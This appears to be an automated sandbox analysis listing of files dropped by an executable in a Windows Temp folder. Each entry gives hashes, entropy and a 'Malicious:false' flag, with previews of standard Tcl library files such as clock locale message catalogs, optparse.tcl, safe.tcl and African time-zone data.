                                                                                                                                                                                                                                                    Size (bytes):411
                                                                                                                                                                                                                                                    Entropy (8bit):5.01781242466238
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:4EnLzu8CjZWsn0sEjoD0sLvUFS3v6r5F3vMq:4azu84Z1nnEjoDnLvUFEvS5NvMq
                                                                                                                                                                                                                                                    MD5:443E34E2E2BC7CB64A8BA52D99D6B4B6
                                                                                                                                                                                                                                                    SHA1:D323C03747FE68E9B73F7E5C1E10B168A40F2A2F
                                                                                                                                                                                                                                                    SHA-256:88BDAF4B25B684B0320A2E11D3FE77DDDD25E3B17141BD7ED1D63698C480E4BA
                                                                                                                                                                                                                                                    SHA-512:5D8B267530EC1480BF3D571AABC2DA7B4101EACD7FB03B49049709E39D665DD7ACB66FD785BA2B5203DDC54C520434219D2D9974A1E9EE74C659FFAEA6B694E0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset te_IN AM "\u0c2a\u0c42\u0c30\u0c4d\u0c35\u0c3e\u0c39\u0c4d\u0c28". ::msgcat::mcset te_IN PM "\u0c05\u0c2a\u0c30\u0c3e\u0c39\u0c4d\u0c28". ::msgcat::mcset te_IN DATE_FORMAT "%d/%m/%Y". ::msgcat::mcset te_IN TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset te_IN DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2305
                                                                                                                                                                                                                                                    Entropy (8bit):4.324407451316591
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:46P4QX/wQT0H/u3rPc8JD57XWWND8QM70xJi53Ljtef:hQ556rVDWZcLOO
                                                                                                                                                                                                                                                    MD5:D145F9DF0E339A2538662BD752F02E16
                                                                                                                                                                                                                                                    SHA1:AFD97F8E8CC14D306DEDD78F8F395738E38A8569
                                                                                                                                                                                                                                                    SHA-256:F9641A6EBE3845CE5D36CED473749F5909C90C52E405F074A6DA817EF6F39867
                                                                                                                                                                                                                                                    SHA-512:E17925057560462F730CF8288856E46FA1F1D2A10B5D4D343257B7687A3855014D5C65B6C85AC55A7C77B8B355DB19F053C74B91DFA7BE7E9F933D9D4DA117F7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset th DAYS_OF_WEEK_ABBREV [list \. "\u0e2d\u0e32."\. "\u0e08."\. "\u0e2d."\. "\u0e1e."\. "\u0e1e\u0e24."\. "\u0e28."\. "\u0e2a."]. ::msgcat::mcset th DAYS_OF_WEEK_FULL [list \. "\u0e27\u0e31\u0e19\u0e2d\u0e32\u0e17\u0e34\u0e15\u0e22\u0e4c"\. "\u0e27\u0e31\u0e19\u0e08\u0e31\u0e19\u0e17\u0e23\u0e4c"\. "\u0e27\u0e31\u0e19\u0e2d\u0e31\u0e07\u0e04\u0e32\u0e23"\. "\u0e27\u0e31\u0e19\u0e1e\u0e38\u0e18"\. "\u0e27\u0e31\u0e19\u0e1e\u0e24\u0e2b\u0e31\u0e2a\u0e1a\u0e14\u0e35"\. "\u0e27\u0e31\u0e19\u0e28\u0e38\u0e01\u0e23\u0e4c"\. "\u0e27\u0e31\u0e19\u0e40\u0e2a\u0e32\u0e23\u0e4c"]. ::msgcat::mcset th MONTHS_ABBREV [list \. "\u0e21.\u0e04."\. "\u0e01.\u0e1e."\. "\u0e21\u0e35.\u0e04."\. "\u0e40\u0e21.\u0e22."\. "\u0e1e.\u0e04."\. "\u0e21\u0e34.\u0e22."\. "\
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1133
                                                                                                                                                                                                                                                    Entropy (8bit):4.32041719596907
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu80VAFVsNTib5vk5CfYTnGk65GmogWFLNvoKvWI3:46j8NTgwVTnlSJWFLJvWI3
                                                                                                                                                                                                                                                    MD5:3AFAD9AD82A9C8B754E2FE8FC0094BAB
                                                                                                                                                                                                                                                    SHA1:4EE3E2DF86612DB314F8D3E7214D7BE241AA1A32
                                                                                                                                                                                                                                                    SHA-256:DF7C4BA67457CB47EEF0F5CA8E028FF466ACDD877A487697DC48ECAC7347AC47
                                                                                                                                                                                                                                                    SHA-512:79A6738A97B7DB9CA4AE9A3BA1C3E56BE9AC67E71AE12154FD37A37D78892B6414A49E10E007DE2EB314942DC017B87FAB7C64B74EC9B889DAEBFF9B3B78E644
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset tr DAYS_OF_WEEK_ABBREV [list \. "Paz"\. "Pzt"\. "Sal"\. "\u00c7ar"\. "Per"\. "Cum"\. "Cmt"]. ::msgcat::mcset tr DAYS_OF_WEEK_FULL [list \. "Pazar"\. "Pazartesi"\. "Sal\u0131"\. "\u00c7ar\u015famba"\. "Per\u015fembe"\. "Cuma"\. "Cumartesi"]. ::msgcat::mcset tr MONTHS_ABBREV [list \. "Oca"\. "\u015eub"\. "Mar"\. "Nis"\. "May"\. "Haz"\. "Tem"\. "A\u011fu"\. "Eyl"\. "Eki"\. "Kas"\. "Ara"\. ""]. ::msgcat::mcset tr MONTHS_FULL [list \. "Ocak"\. "\u015eubat"\. "Mart"\. "Nisan"\. "May\u0131s"\. "Haziran"\. "Temmuz"\. "A\u011fustos"\. "Eyl\u00fcl"\. "Ekim"\. "Kas\u0131m"\. "Aral\u0131k"\. ""]. ::msgcat::mcset tr D
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2113
                                                                                                                                                                                                                                                    Entropy (8bit):4.227105489438195
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset uk DAYS_OF_WEEK_ABBREV [list \. "\u043d\u0434"\. "\u043f\u043d"\. "\u0432\u0442"\. "\u0441\u0440"\. "\u0447\u0442"\. "\u043f\u0442"\. "\u0441\u0431"]. ::msgcat::mcset uk DAYS_OF_WEEK_FULL [list \. "\u043d\u0435\u0434\u0456\u043b\u044f"\. "\u043f\u043e\u043d\u0435\u0434\u0456\u043b\u043e\u043a"\. "\u0432\u0456\u0432\u0442\u043e\u0440\u043e\u043a"\. "\u0441\u0435\u0440\u0435\u0434\u0430"\. "\u0447\u0435\u0442\u0432\u0435\u0440"\. "\u043f'\u044f\u0442\u043d\u0438\u0446\u044f"\. "\u0441\u0443\u0431\u043e\u0442\u0430"]. ::msgcat::mcset uk MONTHS_ABBREV [list \. "\u0441\u0456\u0447"\. "\u043b\u044e\u0442"\. "\u0431\u0435\u0440"\. "\u043a\u0432\u0456\u0442"\. "\u0442\u0440\u0430\u0432"\. "\u0447\u0435\u0440\u0432"\. "\u043b\u0438\u043f"\. "\
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1421
                                                                                                                                                                                                                                                    Entropy (8bit):4.382223858419589
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset vi DAYS_OF_WEEK_ABBREV [list \. "Th 2"\. "Th 3"\. "Th 4"\. "Th 5"\. "Th 6"\. "Th 7"\. "CN"]. ::msgcat::mcset vi DAYS_OF_WEEK_FULL [list \. "Th\u01b0\u0301 hai"\. "Th\u01b0\u0301 ba"\. "Th\u01b0\u0301 t\u01b0"\. "Th\u01b0\u0301 n\u0103m"\. "Th\u01b0\u0301 s\u00e1u"\. "Th\u01b0\u0301 ba\u0309y"\. "Chu\u0309 nh\u00e2\u0323t"]. ::msgcat::mcset vi MONTHS_ABBREV [list \. "Thg 1"\. "Thg 2"\. "Thg 3"\. "Thg 4"\. "Thg 5"\. "Thg 6"\. "Thg 7"\. "Thg 8"\. "Thg 9"\. "Thg 10"\. "Thg 11"\. "Thg 12"\. ""]. ::msgcat::mcset vi MONTHS_FULL [list \. "Th\u00e1ng m\u00f4\u0323t"\. "Th\u00e1ng hai"\. "Th\u00e1ng ba"\. "Th\u00e1ng t\u01b0"\. "Th\u00e1ng n\u0103m"\. "Th\u00e1ng s\
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1598)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3330
                                                                                                                                                                                                                                                    Entropy (8bit):4.469203967086526
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh DAYS_OF_WEEK_ABBREV [list \. "\u661f\u671f\u65e5"\. "\u661f\u671f\u4e00"\. "\u661f\u671f\u4e8c"\. "\u661f\u671f\u4e09"\. "\u661f\u671f\u56db"\. "\u661f\u671f\u4e94"\. "\u661f\u671f\u516d"]. ::msgcat::mcset zh DAYS_OF_WEEK_FULL [list \. "\u661f\u671f\u65e5"\. "\u661f\u671f\u4e00"\. "\u661f\u671f\u4e8c"\. "\u661f\u671f\u4e09"\. "\u661f\u671f\u56db"\. "\u661f\u671f\u4e94"\. "\u661f\u671f\u516d"]. ::msgcat::mcset zh MONTHS_ABBREV [list \. "\u4e00\u6708"\. "\u4e8c\u6708"\. "\u4e09\u6708"\. "\u56db\u6708"\. "\u4e94\u6708"\. "\u516d\u6708"\. "\u4e03\u6708"\. "\u516b\u6708"\. "\u4e5d\u6708"\. "\u5341\u6708"\. "\u5341\u4e00\u6708"\. "\u5341\u4e8c\u6708"\. ""]. ::msgcat::mcset zh MONTHS_FULL [list \.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):312
                                                                                                                                                                                                                                                    Entropy (8bit):5.1281364096481665
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh_CN DATE_FORMAT "%Y-%m-%e". ::msgcat::mcset zh_CN TIME_FORMAT "%k:%M:%S". ::msgcat::mcset zh_CN TIME_FORMAT_12 "%P%I\u65f6%M\u5206%S\u79d2". ::msgcat::mcset zh_CN DATE_TIME_FORMAT "%Y-%m-%e %k:%M:%S %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):752
                                                                                                                                                                                                                                                    Entropy (8bit):4.660158381384211
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh_HK DAYS_OF_WEEK_ABBREV [list \. "\u65e5"\. "\u4e00"\. "\u4e8c"\. "\u4e09"\. "\u56db"\. "\u4e94"\. "\u516d"]. ::msgcat::mcset zh_HK MONTHS_ABBREV [list \. "1\u6708"\. "2\u6708"\. "3\u6708"\. "4\u6708"\. "5\u6708"\. "6\u6708"\. "7\u6708"\. "8\u6708"\. "9\u6708"\. "10\u6708"\. "11\u6708"\. "12\u6708"\. ""]. ::msgcat::mcset zh_HK DATE_FORMAT "%Y\u5e74%m\u6708%e\u65e5". ::msgcat::mcset zh_HK TIME_FORMAT_12 "%P%I:%M:%S". ::msgcat::mcset zh_HK DATE_TIME_FORMAT "%Y\u5e74%m\u6708%e\u65e5 %P%I:%M:%S %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):339
                                                                                                                                                                                                                                                    Entropy (8bit):5.020358587042703
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh_SG AM "\u4e0a\u5348". ::msgcat::mcset zh_SG PM "\u4e2d\u5348". ::msgcat::mcset zh_SG DATE_FORMAT "%d %B %Y". ::msgcat::mcset zh_SG TIME_FORMAT_12 "%P %I:%M:%S". ::msgcat::mcset zh_SG DATE_TIME_FORMAT "%d %B %Y %P %I:%M:%S %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):346
                                                                                                                                                                                                                                                    Entropy (8bit):5.08314435797197
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh_TW BCE "\u6c11\u570b\u524d". ::msgcat::mcset zh_TW CE "\u6c11\u570b". ::msgcat::mcset zh_TW DATE_FORMAT "%Y/%m/%e". ::msgcat::mcset zh_TW TIME_FORMAT_12 "%P %I:%M:%S". ::msgcat::mcset zh_TW DATE_TIME_FORMAT "%Y/%m/%e %P %I:%M:%S %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):32944
                                                                                                                                                                                                                                                    Entropy (8bit):4.566500533811999
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# optparse.tcl --.#.# (private) Option parsing package.# Primarily used internally by the safe:: code..#.#.WARNING: This code will go away in a future release.#.of Tcl. It is NOT supported and you should not rely.#.on it. If your code does rely on this package you.#.may directly incorporate this code into your application...package require Tcl 8.2.# When this version number changes, update the pkgIndex.tcl file.# and the install directory in the Makefiles..package provide opt 0.4.5..namespace eval ::tcl {.. # Exported APIs. namespace export OptKeyRegister OptKeyDelete OptKeyError OptKeyParse \. OptProc OptProcArgGiven OptParse \.. Lempty Lget \. Lassign Lvarpop Lvarpop1 Lvarset Lvarincr \. SetMax SetMin...################# Example of use / 'user documentation' ###################.. proc OptCreateTestProc {} {...# Defines ::tcl::OptParseTest as a test proc with parsed arguments..# (can't be defined before the code below is
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):607
                                                                                                                                                                                                                                                    Entropy (8bit):4.652658850873767
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Tcl package index file, version 1.1.# This file is generated by the "pkg_mkIndex -direct" command.# and sourced either when an application starts up or.# by a "package unknown" script. It invokes the.# "package ifneeded" command to set up package-related.# information so that packages will be loaded automatically.# in response to "package require" commands. When this.# script is sourced, the variable $dir must contain the.# full path name of this file's directory...if {![package vsatisfies [package provide Tcl] 8.2]} {return}.package ifneeded opt 0.4.5 [list source [file join $dir optparse.tcl]].
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):23329
                                                                                                                                                                                                                                                    Entropy (8bit):4.8430523159994205
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# package.tcl --.#.# utility procs formerly in init.tcl which can be loaded on demand.# for package management..#.# Copyright (c) 1991-1993 The Regents of the University of California..# Copyright (c) 1994-1998 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..namespace eval tcl::Pkg {}..# ::tcl::Pkg::CompareExtension --.#.# Used internally by pkg_mkIndex to compare the extension of a file to.# a given extension. On Windows, it uses a case-insensitive comparison.# because the file system can be file insensitive..#.# Arguments:.# fileName.name of a file whose extension is compared.# ext..(optional) The extension to compare against; you must.#..provide the starting dot..#..Defaults to [info sharedlibextension].#.# Results:.# Returns 1 if the extension matches, 0 otherwise..proc tcl::Pkg::CompareExtension { fileName {ext {}} } {. global tcl_platform. if {$ext eq ""} {se
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):816
                                                                                                                                                                                                                                                    Entropy (8bit):4.833285375693491
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# parray:.# Print the contents of a global array on stdout..#.# Copyright (c) 1991-1993 The Regents of the University of California..# Copyright (c) 1994 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..proc parray {a {pattern *}} {. upvar 1 $a array. if {![array exists array]} {..return -code error "\"$a\" isn't an array". }. set maxl 0. set names [lsort [array names array $pattern]]. foreach name $names {..if {[string length $name] > $maxl} {.. set maxl [string length $name]..}. }. set maxl [expr {$maxl + [string length $a] + 2}]. foreach name $names {..set nameString [format %s(%s) $a $name]..puts stdout [format "%-*s = %s" $maxl $nameString $array($name)]. }.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):33155
                                                                                                                                                                                                                                                    Entropy (8bit):4.751913624674884
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# safe.tcl --.#.# This file provide a safe loading/sourcing mechanism for safe interpreters..# It implements a virtual path mecanism to hide the real pathnames from the.# slave. It runs in a master interpreter and sets up data structure and.# aliases that will be invoked when used from a slave interpreter..#.# See the safe.n man page for details..#.# Copyright (c) 1996-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution of.# this file, and for a DISCLAIMER OF ALL WARRANTIES...#.# The implementation is based on namespaces. These naming conventions are.# followed:.# Private procs starts with uppercase..# Public procs are exported and starts with lowercase.#..# Needed utilities package.package require opt 0.4.1..# Create the safe namespace.namespace eval ::safe {. # Exported API:. namespace export interpCreate interpInit interpConfigure interpDelete \..interpAddToAccessPath interpFindInAccessPath setLogCmd.}..# Helper function to
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6379
                                                                                                                                                                                                                                                    Entropy (8bit):4.688241504356218
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Tcl autoload index file, version 2.0.# This file is generated by the "auto_mkindex" command.# and sourced to set up indexing information for one or.# more commands. Typically each line is a command that.# sets an element in the auto_index array, where the.# element name is the name of a command and the value is.# a script that loads the command...set auto_index(auto_reset) [list source [file join $dir auto.tcl]].set auto_index(tcl_findLibrary) [list source [file join $dir auto.tcl]].set auto_index(auto_mkindex) [list source [file join $dir auto.tcl]].set auto_index(auto_mkindex_old) [list source [file join $dir auto.tcl]].set auto_index(::auto_mkindex_parser::init) [list source [file join $dir auto.tcl]].set auto_index(::auto_mkindex_parser::cleanup) [list source [file join $dir auto.tcl]].set auto_index(::auto_mkindex_parser::mkindex) [list source [file join $dir auto.tcl]].set auto_index(::auto_mkindex_parser::hook) [list source [file join $dir auto.tcl]].set auto_index(::auto_mki
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):11739
                                                                                                                                                                                                                                                    Entropy (8bit):4.696987328866101
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# -*- tcl -*-.#.# Searching for Tcl Modules. Defines a procedure, declares it as the.# primary command for finding packages, however also uses the former.# 'package unknown' command as a fallback..#.# Locates all possible packages in a directory via a less restricted.# glob. The targeted directory is derived from the name of the.# requested package. I.e. the TM scan will look only at directories.# which can contain the requested package. It will register all.# packages it found in the directory so that future requests have a.# higher chance of being fulfilled by the ifneeded database without.# having to come to us again..#.# We do not remember where we have been and simply rescan targeted.# directories when invoked again. The reasoning is this:.#.# - The only way we get back to the same directory is if someone is.# trying to [package require] something that wasn't there on the.# first scan..#.# Either.# 1) It is there now: If we rescan, you get it; if not you don't..#.# T
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):141
                                                                                                                                                                                                                                                    Entropy (8bit):4.951583909886815
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Abidjan) {. {-9223372036854775808 -968 0 LMT}. {-1830383032 0 0 GMT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1416
                                                                                                                                                                                                                                                    Entropy (8bit):3.9989157635712558
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Accra) {. {-9223372036854775808 -52 0 LMT}. {-1640995148 0 0 GMT}. {-1556841600 1200 1 GHST}. {-1546388400 0 0 GMT}. {-1525305600 1200 1 GHST}. {-1514852400 0 0 GMT}. {-1493769600 1200 1 GHST}. {-1483316400 0 0 GMT}. {-1462233600 1200 1 GHST}. {-1451780400 0 0 GMT}. {-1430611200 1200 1 GHST}. {-1420158000 0 0 GMT}. {-1399075200 1200 1 GHST}. {-1388622000 0 0 GMT}. {-1367539200 1200 1 GHST}. {-1357086000 0 0 GMT}. {-1336003200 1200 1 GHST}. {-1325550000 0 0 GMT}. {-1304380800 1200 1 GHST}. {-1293927600 0 0 GMT}. {-1272844800 1200 1 GHST}. {-1262391600 0 0 GMT}. {-1241308800 1200 1 GHST}. {-1230855600 0 0 GMT}. {-1209772800 1200 1 GHST}. {-1199319600 0 0 GMT}. {-1178150400 1200 1 GHST}. {-1167697200 0 0 GMT}. {-1146614400 1200 1 GHST}. {-1136161200 0 0 GMT}. {-1115078400 1200 1 GHST}. {-1104625200 0 0 GMT}. {-1083542400 1200 1
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.766991307890532
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Africa/Addis_Ababa) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1041
                                                                                                                                                                                                                                                    Entropy (8bit):4.110061823095588
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Algiers) {. {-9223372036854775808 732 0 LMT}. {-2486679072 561 0 PMT}. {-1855958961 0 0 WET}. {-1689814800 3600 1 WEST}. {-1680397200 0 0 WET}. {-1665363600 3600 1 WEST}. {-1648342800 0 0 WET}. {-1635123600 3600 1 WEST}. {-1616893200 0 0 WET}. {-1604278800 3600 1 WEST}. {-1585443600 0 0 WET}. {-1574038800 3600 1 WEST}. {-1552266000 0 0 WET}. {-1539997200 3600 1 WEST}. {-1531443600 0 0 WET}. {-956365200 3600 1 WEST}. {-950486400 0 0 WET}. {-942012000 3600 0 CET}. {-812502000 7200 1 CEST}. {-796262400 3600 0 CET}. {-781052400 7200 1 CEST}. {-766630800 3600 0 CET}. {-733280400 0 0 WET}. {-439430400 3600 0 CET}. {-212029200 0 0 WET}. {41468400 3600 1 WEST}. {54774000 0 0 WET}. {231724800 3600 1 WEST}. {246240000 3600 0 CET}. {259545600 7200 1 CEST}. {275274000 3600 0 CET}. {309740400 0 0 WET}. {325468800 3600 1 WEST}. {3418020
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                    Entropy (8bit):4.750118730136804
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Africa/Asmara) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                    Entropy (8bit):4.755468133981916
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Africa/Asmera) $TZData(:Africa/Nairobi).
